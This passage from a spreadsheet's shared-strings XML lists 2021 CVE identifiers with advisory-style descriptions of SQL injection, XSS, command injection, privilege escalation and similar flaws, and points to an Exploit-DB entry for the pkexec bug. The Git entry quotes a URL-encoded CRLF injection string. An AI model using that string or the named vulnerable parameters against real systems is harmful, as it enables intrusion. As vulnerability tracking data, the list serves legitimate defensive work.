    <t>An SQL Injection vulnerability exists in zzcms 8.2, 8.3, 2020, abd 2021 in dl/dl_download.php. when registering ordinary users.</t>
  </si>
  <si>
    <t>CVE-2021-40284</t>
  </si>
  <si>
    <t>D-Link DSL-3782 EU v1.01:EU v1.03 is affected by a buffer overflow which can cause a denial of service. This vulnerability exists in the web interface "/cgi-bin/New_GUI/Igmp.asp". Authenticated remote attackers can trigger this vulnerability by sending a long string in parameter 'igmpsnoopEnable' via an HTTP request.</t>
  </si>
  <si>
    <t>CVE-2021-40285</t>
  </si>
  <si>
    <t>htmly v2.8.1 was discovered to contain an arbitrary file deletion vulnerability via the component \views\backup.html.php.</t>
  </si>
  <si>
    <t>CVE-2021-40288</t>
  </si>
  <si>
    <t>A denial-of-service attack in WPA2, and WPA3-SAE authentication methods in TP-Link AX10v1 before V1_211014, allows a remote unauthenticated attacker to disconnect an already connected wireless client via sending with a wireless adapter specific spoofed authentication frames</t>
  </si>
  <si>
    <t>CVE-2021-40289</t>
  </si>
  <si>
    <t>mm-wki v0.2.1 is vulnerable to Cross Site Scripting (XSS).</t>
  </si>
  <si>
    <t>CVE-2021-4029</t>
  </si>
  <si>
    <t>A command injection vulnerability in the CGI program of the Zyxel ARMOR Z1/Z2 firmware could allow an attacker to execute arbitrary OS commands via a LAN interface.</t>
  </si>
  <si>
    <t>CVE-2021-40292</t>
  </si>
  <si>
    <t>A Stored Cross Site Sripting (XSS) vulnerability exists in DzzOffice 2.02.1 via the settingnew parameter.</t>
  </si>
  <si>
    <t>CVE-2021-4030</t>
  </si>
  <si>
    <t>A cross-site request forgery vulnerability in the HTTP daemon of the Zyxel ARMOR Z1/Z2 firmware could allow an attacker to execute arbitrary commands if they coerce or trick a local user to visit a compromised website with malicious scripts.</t>
  </si>
  <si>
    <t>CVE-2021-40303</t>
  </si>
  <si>
    <t>perfex crm 1.10 is vulnerable to Cross Site Scripting (XSS) via /clients/profile.</t>
  </si>
  <si>
    <t>CVE-2021-40309</t>
  </si>
  <si>
    <t>A SQL injection vulnerability exists in the Take Attendance functionality of OS4Ed's OpenSIS 8.0. allows an attacker to inject their own SQL query. The cp_id_miss_attn parameter from TakeAttendance.php is vulnerable to SQL injection. An attacker can make an authenticated HTTP request as a user with access to "Take Attendance" functionality to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-4031</t>
  </si>
  <si>
    <t>Syltek application before its 10.22.00 version, does not correctly check that a product ID has a valid payment associated to it. This could allow an attacker to forge a request and bypass the payment system by marking items as payed without any verification.</t>
  </si>
  <si>
    <t>CVE-2021-40310</t>
  </si>
  <si>
    <t>OpenSIS Community Edition version 8.0 is affected by a cross-site scripting (XSS) vulnerability in the TakeAttendance.php via the cp_id_miss_attn parameter.</t>
  </si>
  <si>
    <t>CVE-2021-40313</t>
  </si>
  <si>
    <t>Piwigo v11.5 was discovered to contain a SQL injection vulnerability via the parameter pwg_token in /admin/batch_manager_global.php.</t>
  </si>
  <si>
    <t>CVE-2021-40317</t>
  </si>
  <si>
    <t>Piwigo 11.5.0 is affected by a SQL injection vulnerability via admin.php and the id parameter.</t>
  </si>
  <si>
    <t>CVE-2021-4032</t>
  </si>
  <si>
    <t>A vulnerability was found in the Linux kernel's KVM subsystem in arch/x86/kvm/lapic.c kvm_free_lapic when a failure allocation was detected. In this flaw the KVM subsystem may crash the kernel due to mishandling of memory errors that happens during VCPU construction, which allows an attacker with special user privilege to cause a denial of service. This flaw affects kernel versions prior to 5.15 rc7.</t>
  </si>
  <si>
    <t>CVE-2021-40323</t>
  </si>
  <si>
    <t>Cobbler before 3.3.0 allows log poisoning, and resultant Remote Code Execution, via an XMLRPC method that logs to the logfile for template injection.</t>
  </si>
  <si>
    <t>CVE-2021-40324</t>
  </si>
  <si>
    <t>Cobbler before 3.3.0 allows arbitrary file write operations via upload_log_data.</t>
  </si>
  <si>
    <t>CVE-2021-40325</t>
  </si>
  <si>
    <t>Cobbler before 3.3.0 allows authorization bypass for modification of settings.</t>
  </si>
  <si>
    <t>CVE-2021-40326</t>
  </si>
  <si>
    <t>Foxit PDF Reader before 11.1 and PDF Editor before 11.1, and PhantomPDF before 10.1.6, mishandle hidden and incremental data in signed documents. An attacker can write to an arbitrary file, and display controlled contents, during signature verification.</t>
  </si>
  <si>
    <t>CVE-2021-40327</t>
  </si>
  <si>
    <t>Trusted Firmware-M (TF-M) 1.4.0, when Profile Small is used, has incorrect access control. NSPE can access a secure key (held by the Crypto service) based solely on knowledge of its key ID. For example, there is no authorization check associated with the relationship between a caller and a key owner.</t>
  </si>
  <si>
    <t>CVE-2021-40329</t>
  </si>
  <si>
    <t>The Authentication API in Ping Identity PingFederate before 10.3 mishandles certain aspects of external password management.</t>
  </si>
  <si>
    <t>CVE-2021-4033</t>
  </si>
  <si>
    <t>CVE-2021-40330</t>
  </si>
  <si>
    <t>git_connect_git in connect.c in Git before 2.30.1 allows a repository path to contain a newline character, which may result in unexpected cross-protocol requests, as demonstrated by the git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1 substring.</t>
  </si>
  <si>
    <t>CVE-2021-40333</t>
  </si>
  <si>
    <t>Weak Password Requirements vulnerability in Hitachi Energy FOX61x, XCM20 allows an attacker to gain unauthorized access to the Data Communication Network (DCN) routing configuration. This issue affects: Hitachi Energy FOX61x versions prior to R15A. Hitachi Energy XCM20 versions prior to R15A.</t>
  </si>
  <si>
    <t>CVE-2021-40334</t>
  </si>
  <si>
    <t>Missing Handler vulnerability in the proprietary management protocol (port TCP 5558) of Hitachi Energy FOX61x, XCM20 allows an attacker that exploits the vulnerability by activating SSH on port TCP 5558 to cause disruption to the NMS and NE communication. This issue affects: Hitachi Energy FOX61x versions prior to R15A. Hitachi Energy XCM20 versions prior to R15A.</t>
  </si>
  <si>
    <t>CVE-2021-40335</t>
  </si>
  <si>
    <t>A vulnerability exists in the HTTP web interface where the web interface does not sufficiently verify if a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. This cause a Cross Site Request Forgery (CSRF), which if exploited could lead an attacker to gain unauthorized access to the web application and perform an unwanted operation on it without the knowledge of the legitimate user. An attacker, who successfully makes an MSM user who has already established a session to MSM web interface clicks a forged link to the MSM web interface, e.g., link is sent per E-Mail, could perform harmful command on MSM through its web server interface. This issue affects: Hitachi Energy MSM V2.2 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-40336</t>
  </si>
  <si>
    <t>A vulnerability exists in the http web interface where the web interface does not validate data in an HTTP header. This causes a possible HTTP response splitting, which if exploited could lead an attacker to channel down harmful code into the user’s web browser, such as to steal the session cookies. Thus, an attacker who successfully makes an MSM user who has already established a session to MSM web interface clicks a forged link to the MSM web interface, e.g., the link is sent per E-Mail, could trick the user into downloading malicious software onto his computer. This issue affects: Hitachi Energy MSM V2.2 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-40337</t>
  </si>
  <si>
    <t>Cross-site Scripting (XSS) vulnerability in Hitachi Energy LinkOne allows an attacker that manages to exploit the vulnerability can take advantage to exploit multiple web attacks and stole sensitive information. This issue affects: Hitachi Energy LinkOne 3.20; 3.22; 3.23; 3.24; 3.25; 3.26.</t>
  </si>
  <si>
    <t>CVE-2021-40338</t>
  </si>
  <si>
    <t>Hitachi Energy LinkOne product, has a vulnerability due to a web server misconfiguration, that enables debug mode and reveals the full path of the filesystem directory when an attacker generates errors during a query operation. This issue affects: Hitachi Energy LinkOne 3.20; 3.22; 3.23; 3.24; 3.25; 3.26.</t>
  </si>
  <si>
    <t>CVE-2021-40339</t>
  </si>
  <si>
    <t>Configuration vulnerability in Hitachi Energy LinkOne application due to the lack of HTTP Headers, allows an attacker that manages to exploit this vulnerability to retrieve sensitive information. This issue affects: Hitachi Energy LinkOne 3.20; 3.22; 3.23; 3.24; 3.25; 3.26.</t>
  </si>
  <si>
    <t>CVE-2021-4034</t>
  </si>
  <si>
    <t>A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.</t>
  </si>
  <si>
    <t>exploits/linux/local/50689.txt</t>
  </si>
  <si>
    <t>PolicyKit-1 0.105-31 - Privilege Escalation</t>
  </si>
  <si>
    <t>2022-01-27</t>
  </si>
  <si>
    <t>CVE-2021-40340</t>
  </si>
  <si>
    <t>Information Exposure vulnerability in Hitachi Energy LinkOne application, due to a misconfiguration in the ASP server exposes server and ASP.net information, an attacker that manages to exploit this vulnerability can use the exposed information as a reconnaissance for further exploitation. This issue affects: Hitachi Energy LinkOne 3.20; 3.22; 3.23; 3.24; 3.25; 3.26.</t>
  </si>
  <si>
    <t>CVE-2021-40343</t>
  </si>
  <si>
    <t>An issue was discovered in Nagios XI 5.8.5. Insecure file permissions on the nagios_unbundler.py file allow the nagios user to elevate their privileges to the root user.</t>
  </si>
  <si>
    <t>CVE-2021-40344</t>
  </si>
  <si>
    <t>An issue was discovered in Nagios XI 5.8.5. In the Custom Includes section of the Admin panel, an administrator can upload files with arbitrary extensions as long as the MIME type corresponds to an image. Therefore it is possible to upload a crafted PHP script to achieve remote command execution.</t>
  </si>
  <si>
    <t>CVE-2021-40345</t>
  </si>
  <si>
    <t>An issue was discovered in Nagios XI 5.8.5. In the Manage Dashlets section of the Admin panel, an administrator can upload ZIP files. A command injection (within the name of the first file in the archive) allows an attacker to execute system commands.</t>
  </si>
  <si>
    <t>CVE-2021-40346</t>
  </si>
  <si>
    <t>An integer overflow exists in HAProxy 2.0 through 2.5 in htx_add_header that can be exploited to perform an HTTP request smuggling attack, allowing an attacker to bypass all configured http-request HAProxy ACLs and possibly other ACLs.</t>
  </si>
  <si>
    <t>CVE-2021-40347</t>
  </si>
  <si>
    <t>An issue was discovered in views/list.py in GNU Mailman Postorius before 1.3.5. An attacker (logged into any account) can send a crafted POST request to unsubscribe any user from a mailing list, also revealing whether that address was subscribed in the first place.</t>
  </si>
  <si>
    <t>CVE-2021-40348</t>
  </si>
  <si>
 